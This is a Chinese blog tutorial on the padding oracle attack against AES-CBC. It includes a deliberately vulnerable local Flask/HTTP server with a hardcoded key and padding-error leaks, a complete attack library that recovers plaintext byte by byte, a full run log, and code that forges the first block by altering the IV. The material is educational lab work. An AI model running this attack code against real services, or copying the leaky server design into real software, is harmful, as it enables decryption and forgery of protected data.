zoukankan      html  css  js  c++  java
  • AES CBC模式下的Padding Oracle解密

    AES CBC模式下的Padding Oracle解密

    AES CBC模式下的Padding Oracle解密

    1 简介

    Padding Oracle攻击方法出现的也比较早了,参考padding oracle attack,这篇文章写的比较好。 也可以参考ctf-wiki。 Padding Oracle Attack主要是针对CBC分组加密的情况,通过padding来测试每个分组的每个字节是否正确来获取分组的中间状态值,上一个分组XOR中间状态值就是明文。第一个分组使用初始IV来XOR获得明文。

    https://img2018.cnblogs.com/blog/1545892/201906/1545892-20190621172625457-1317081856.jpg

    图1  CBC模式一个分组的解密过程

    2 aes cbc加解密测试程序

    用FLASK实现一个aes cbc加解密的测试程序,代码如下,保存为aes_server.py:

    #!/usr/bin/python
    # coding=utf-8
    # python 3
    # 安装依赖 pip3 install PyCrypto flask
    # 运行 FLASK_APP=aes_server.py  flask run
    
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import urlparse, parse_qs, unquote
    import traceback
    
    import base64
    import hashlib
    from Crypto import Random
    from Crypto.Cipher import AES
    
    # padding 对齐的字节数
    BS = 16
    
    
    def pad(s):
        return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    
    
    def unpad(s):
        '''检查解密串的padding是否正确,并去掉Padding'''
        pad = s[-1]
        # padding值不对就抛出异常,网上的python实现基本都忽略了padding值检查
        if pad > BS or pad < 1:
            # padding值大于0小于等于最大分组字节数
            raise Exception("padding error.")
        slen = len(s)
        for p in s[slen-pad:slen]:
            # 所有padding值相等
            if p != pad:
                raise Exception("padding value error.")
        print("unpad:", pad)
        return s[0:-pad]
    
    
    class AESCipher:
        """ AES cbc 加解密
        """
    
        def __init__(self, key):
            self.key = key.encode('utf-8')
    
        def encrypt(self, raw):
            raw = pad(raw).encode('utf-8')
            iv = Random.new().read(AES.block_size)
            c = AES.new(self.key, AES.MODE_CBC, iv)
            return str(base64.b64encode(iv + c.encrypt(raw)), 'utf-8')
    
        def decrypt(self, enc):
            enc = base64.b64decode(enc)
            iv = enc[:16]
            c = AES.new(self.key, AES.MODE_CBC, iv)
            deced = unpad(c.decrypt(enc[16:]))
            return deced
    
    
    cipher = AESCipher('1234567890123456')
    # cipher.encrypt('testaa')
    
    form = '''<!DOCTYPE html>
    <title>aes encoder/decoder</title>
    <form method="POST" action="/encode">
    <textarea name="body"></textarea>
    <br>
    <button type="submit">加密</button>
    </form>'''
    
    PORT_NUMBER = 8081
    
    
    def b64_url_dec(s):
        return s.replace('~', '=').replace('!', '/').replace('-', '+')
    
    
    def b64_url_enc(s):
        return s.replace('+', '-').replace('/', '!').replace('=', '~')
    
    
    class myHandler(BaseHTTPRequestHandler):
        # Handler for the GET requests
        def write_out(self, data):
            self.send_response(200)
            self.send_header('Content-type', 'text/html; charset=utf-8')
            self.end_headers()
            self.wfile.write(data)
    
        def do_GET(self):
            if "/decode" in self.path:
                try:
                    # 解密操作
                    query = urlparse(self.path).query
                    print('decode query:', query)
                    query_components = dict(qc.split("=")
                                            for qc in query.split("&"))
                    data = b64_url_dec(unquote(query_components["data"]))
                    deced = cipher.decrypt(data)
                    self.write_out(deced)
                except:
                    self.write_out(traceback.format_exc().encode())
            elif "/check" in self.path:
                try:
                    # 检查是否能正确解密
                    query = urlparse(self.path).query
                    print('check query:', query)
                    query_components = dict(qc.split("=")
                                            for qc in query.split("&"))
                    data = b64_url_dec(unquote(query_components["data"]))
                    deced = cipher.decrypt(data)
                    self.write_out(u'成功通过!'.encode('utf-8'))
                except:
                    self.write_out(traceback.format_exc().encode())
            else:
                self.write_out(form.encode())
    
        def do_POST(self):
            print("post:", self.path)
            if self.path == "/encode":
                # 加密操作
                try:
                    content_len = int(self.headers.get('Content-Length'))
                    post_body = self.rfile.read(content_len)
                    postvars = parse_qs(post_body, keep_blank_values=1)
                    print('post encode vars:', postvars)
                    body = str(postvars[b'body'][0], 'utf-8')
                    enced = cipher.encrypt(body)
                    out = b64_url_enc(enced)
                    self.write_out(out.encode())
                except:
                    self.write_out(traceback.format_exc().encode())
    
    
    try:
        # Create a web server and define the handler to manage the
        # incoming request
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port ', PORT_NUMBER)
        # Wait forever for incoming htto requests
        server.serve_forever()
    
    except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()
    

    encode用于加密一个字符串,decode解密加密后的字符串,check用于测试加密串是否正确,这里使用check进行Padding Oracle Attack测试,比较接近真实情况。

    启动flask server,通过8081端口访问:

    FLASK_APP=aes_server.py  flask run
    

    使用python测试请求,代码如下:

    # coding=utf-8
    # python 3
    # 安装依赖 pip3 install requests
    
    import requests as req
    
    proxy = 'http://127.0.0.1:8080'
    MY_PROXY = {
        # 本地代理,用于测试,如果不需要代理可以注释掉
        #'http': proxy,
        #'https': proxy,
    }
    
    # server端地址,测试的时候使用windows本机启动FLASK,python代码访问会卡住。
    host = 'http://192.168.47.129:8081'
    
    
    def test_enc(txt):
        '''测试加密'''
        resp = req.post(host + '/encode', data={'body': txt}, proxies=MY_PROXY)
        return resp.text
    
    
    def test_dec(txt):
        '''测试解密'''
        resp = req.get(host + '/decode', params={'data': txt}, proxies=MY_PROXY)
        return resp.text
    
    
    def test_check(txt):
        '''测试检查'''
        resp = req.get(host + '/check', params={'data': txt}, proxies=MY_PROXY)
        return resp.text
    

    测试加密功能:

    print(test_enc('this is a test'))
    

    加密结果如下:

    DAEeUIUbJiXSuxmR8PDlIlOSj5EUKxgueLKy!Wiysd0~
    

    测试解密功能:

    print(test_dec('CLBtfIAQc4PLeB9-6m9XGmtBH34O98vrcw54KPTtx3M~'))
    
    this is a test
    

    解密后的明文padding错误的情况:

    print(test_check('CLBtfIAQc4PAeBA-6m9XGmtAH34O98vrcw54KPTtx3M~'))
    
    Traceback (most recent call last):
      File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 112, in do_GET
        deced = cipher.decrypt(data)
      File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 57, in decrypt
        deced = unpad(c.decrypt(enc[16:]))
      File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 30, in unpad
        raise Exception("padding error.")
    Exception: padding error.
    

    当发送的密文不能解密的时候,会返回padding错误的异常(不一定为异常,只要跟解密成功的结果不同就可以),这样就会造成Padding Oracle攻击。

    3 Padding Oracle Attack过程

    当服务器处理CBC解密时,对于失败和成功返回不同的结果,就能进行Padding Oracle Attack。类似于布尔型SQL注入,针对每个分组的每个字节,输入正确的padding值(相当于明文),修改这个分组的iv,测试并找到返回成功的结果,与padding值XOR就能获得中间状态值(即图中的I2)。

    padding oracle实现代码:

    # coding=utf-8
    # python 3
    # padding oracle 实现代码
    
    from Crypto import Random
    
    
    # 分组最大字节数
    BS = 16
    
    
    def pad(s):
        return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    
    
    def unpad(s):
        return s[0:-s[-1]]
    
    
    def find_valid_byte(req_fn, find_valid_fn, data, pos, min_req):
        '''找到解密数据指定位置的正确IV字节值
        req_fn 请求解密的函数
        find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},
                        返回结果为正确的值,没有则需要返回None
        data 要解密的数据
        pos 要查找正确值的位置
        min_req 最小测试次数,请求达到min_req次,就会比较是否找到正确的padding值'''
        data = bytearray(data)
        results = {}
        for i in range(0x100):
            # 检测从0到255的值是否符合padding要求
            data[pos] = i
            results[i] = req_fn(bytes(data))
            if i >= min_req:
                r_data = find_valid_fn(results)
                if r_data:
                    return r_data
        return find_valid_fn(results)
    
    
    def format_padding_iv(iv, pos, value):
        '''格式化padding对应的iv
        pos 指定开始位置
        value 要测试的padding值
        '''
        r = bytearray(iv)
        for idx, val in enumerate(r):
            if idx > pos:
                r[idx] = val ^ value
            else:
                r[idx] = val
        return bytes(r)
    
    
    def padding_oracle_group(req_fn, find_valid_fn, data, orig_iv, i_state=b'', min_req=256):
        ''' 获取一组数据的解密结果和intermiedate state
        req_fn 请求解密的函数
        find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},
                        返回结果为正确的值,没有则需要返回None
        data 要解密的数据, bytes
        orig_iv 要解密数据的iv, bytes
        i_state 如果指定i_state,则会从没找到的位置继续
        '''
        count = BS - len(i_state)
        iv = bytearray(Random.new().read(count) + i_state)
        r_istate = bytearray(i_state)
        for pos in reversed(range(count)):
            print("pos:%d iv:%s istate:%s" % (pos, iv, r_istate))
            pad_v = BS - pos
            curr_data = format_padding_iv(iv, pos, pad_v) + data
            print('pad_v:', pad_v, ' test data:', curr_data)
            val = find_valid_byte(req_fn, find_valid_fn, curr_data, pos, min_req)
            if val:
                r = val ^ pad_v
                print("find istate %02x at pos:%d" % (r, pos))
                iv[pos] = r
                r_istate.insert(0, r)
            else:
                print("can't find istate at pos:", pos)
                return None, r_istate
        deced_res = bytes(a ^ b for (a, b) in zip(orig_iv, r_istate))
        return deced_res, r_istate
    
    
    def partition_group(data):
        '''data按分组长度进行分组'''
        return [data[i:i+BS] for i in range(0, len(data), BS)]
    
    
    def padding_oracle(req_fn, find_valid_fn, data, min_req=256):
        '''获取一组数据的解密结果和intermiedate state
        req_fn 请求解密的函数
        find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},
                        返回结果为正确的值,没有则需要返回None
        data 加密数据,注意前面要带上iv
        min_req 最小测试次数,请求达到min_req次,就会测试是否包含有效的padding, 
                   用于加速,如果找到有效padding值,后面就不再调用req_fn了。
                   默认全部请求结束再查找正确的padding值。
        '''
        parts = partition_group(data)
        ivs = parts[:-1]
        datas = parts[1:]
        result = b''
        istates = []
        for group_iv, group_data in zip(ivs, datas):
            group_result, group_istate = padding_oracle_group(
                req_fn, find_valid_fn, group_data, group_iv, min_req=min_req)
            result += group_result
            istates.append(group_istate)
        return result, istates
    

    测试代码:

    import re
    import base64
    
    ############### 编码辅助函数
    def b64_url_dec(s):
        return s.replace('~', '=').replace('!', '/').replace('-', '+')
    
    
    def b64_url_enc(s):
        return s.replace('+', '-').replace('/', '!').replace('=', '~')
    
    
    def bytes_to_str(data):
        return "".join(chr(x) for x in bytearray(data))
    
    
    ############## 解密辅助函数
    def my_dec_req(data):
        '''测试解密,注意这里的data是原始字节'''
        txt = b64_url_enc(bytes_to_str(base64.b64encode(data)))
        return test_check(txt)
    
    
    def my_check_ok(resps):
        '''检测并返回解密成功的值'''
        for value, resp in resps.items():
            if re.match(r'成功', resp):
                return value
        return None
    

    解密测试:

    # 获取一个加密数据
    test1 = test_enc('go gogogogo')
    test_data = base64.b64decode(b64_url_dec(test1))
    
    # 这里使用min_req选项,能显著加快运行速度
    results = padding_oracle(my_dec_req, my_check_ok, test_data, min_req=10)
    print(results)
    
    

    程序运行结果:

    pos:15 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88xc5') istate:bytearray(b'')
    pad_v: 1  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88xc58xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 2b at pos:15
    pos:14 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88+') istate:bytearray(b'+')
    pad_v: 2  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88)8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate cd at pos:14
    pos:13 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Txcd+') istate:bytearray(b'xcd+')
    pad_v: 3  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Txce(8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 99 at pos:13
    pos:12 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3x99xcd+') istate:bytearray(b'x99xcd+')
    pad_v: 4  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3x9dxc9/8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 42 at pos:12
    pos:11 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?Bx99xcd+') istate:bytearray(b'Bx99xcd+')
    pad_v: 5  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?Gx9cxc8.8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate f3 at pos:11
    pos:10 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5xf3Bx99xcd+') istate:bytearray(b'xf3Bx99xcd+')
    pad_v: 6  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5xf5Dx9fxcb-8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 6e at pos:10
    pos:9 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15nxf3Bx99xcd+') istate:bytearray(b'nxf3Bx99xcd+')
    pad_v: 7  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15ixf4Ex9exca,8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate e5 at pos:9
    pos:8 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wxe5nxf3Bx99xcd+') istate:bytearray(b'xe5nxf3Bx99xcd+')
    pad_v: 8  test data: b'xd5xd1xfcxc0=Wxdfxa1WxedfxfbJx91xc5#8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 7d at pos:8
    pos:7 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1}xe5nxf3Bx99xcd+') istate:bytearray(b'}xe5nxf3Bx99xcd+')
    pad_v: 9  test data: b'xd5xd1xfcxc0=Wxdfxa1txecgxfaKx90xc4"8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 6a at pos:7
    pos:6 iv:bytearray(b'xd5xd1xfcxc0=Wxdfj}xe5nxf3Bx99xcd+') istate:bytearray(b'j}xe5nxf3Bx99xcd+')
    pad_v: 10  test data: b'xd5xd1xfcxc0=Wxdf`wxefdxf9Hx93xc7!8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 50 at pos:6
    pos:5 iv:bytearray(b'xd5xd1xfcxc0=WPj}xe5nxf3Bx99xcd+') istate:bytearray(b'Pj}xe5nxf3Bx99xcd+')
    pad_v: 11  test data: b'xd5xd1xfcxc0=W[avxeeexf8Ix92xc6 8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 06 at pos:5
    pos:4 iv:bytearray(b'xd5xd1xfcxc0=x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 12  test data: b"xd5xd1xfcxc0=
    \fqxe9bxffNx95xc1'8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb"
    find istate 04 at pos:4
    pos:3 iv:bytearray(b'xd5xd1xfcxc0x04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'x04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 13  test data: b'xd5xd1xfcxc0	x0b]gpxe8cxfeOx94xc0&8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate aa at pos:3
    pos:2 iv:bytearray(b'xd5xd1xfcxaax04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'xaax04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 14  test data: b'xd5xd1xfcxa4
    x08^dsxeb`xfdLx97xc3%8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 94 at pos:2
    pos:1 iv:bytearray(b'xd5xd1x94xaax04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'x94xaax04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 15  test data: b'xd5xd1x9bxa5x0b	_erxeaaxfcMx96xc2$8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate fc at pos:1
    pos:0 iv:bytearray(b'xd5xfcx94xaax04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'xfcx94xaax04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 16  test data: b'xd5xecx84xbax14x16@zmxf5~xe3Rx89xdd;8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate df at pos:0
    (b'go gogogogox05x05x05x05x05', [bytearray(b'xdfxfcx94xaax04x06Pj}xe5nxf3Bx99xcd+')])
    

    可以看到通过/check请求,成功解密出明文, 即results[0]。 results[1]是每个数据分组的中间状态,对应图中的INTERMIEDATE STATE

    再进一步,可以通过修改iv实现对第一个加密的分组数据进行修改,例如:

    # 可以实现伪造第一个数据分组的内容,因为iv是可以改变的,
    # 改变原始iv,就相当于改变了第一个数据分组的解密结果。
    def build_fake_first(data, fake_data, data_is):
        ''' data为密文数据
        fake_data 伪造的第一个分组数据
        data_is 解密出的中间状态值'''
        if len(fake_data) > BS:
            raise Exception('fake data too large!')
        new_data = bytearray(data)
        fake_group_data = pad(fake_data)
        for i in range(BS):
            new_data[i] = ord(fake_group_data[i]) ^ data_is[i]
        return new_data
    
    my_fake = build_fake_first(test_data, 'fake data', results[1][0])
    print(test_dec(b64_url_enc(bytes_to_str(base64.b64encode(my_fake)))))
    

    因为这个加密数据只有1个分组,所以整个数据被替换掉了,结果如下:

    fake data
    

    4 总结

    只要明白了分组解密的xor过程和pkcs5/pkcs7的padding填充方式,Padding Oracle利用还是比较简单的。

    作者: ntestoc

    Created: 2019-06-21 周五 17:26

  • 相关阅读:
    Jquery基于ActiveX的批量上传
    枚举类型在as3中的实现
    delphi操作word基类,插入表格,分页符,日期,页码,替换,图片
    消除文本锯齿
    As3显示对象scrollRect滚动问题
    Bitmap序列化
    加载图片的方法
    球体旋转坐标推导
    AS3基于TextField实现图文并排更新于2015.08.05
    Flash与外部程序之间的通信
  • 原文地址:https://www.cnblogs.com/ntestoc/p/11044433.html
Copyright © 2011-2022 走看看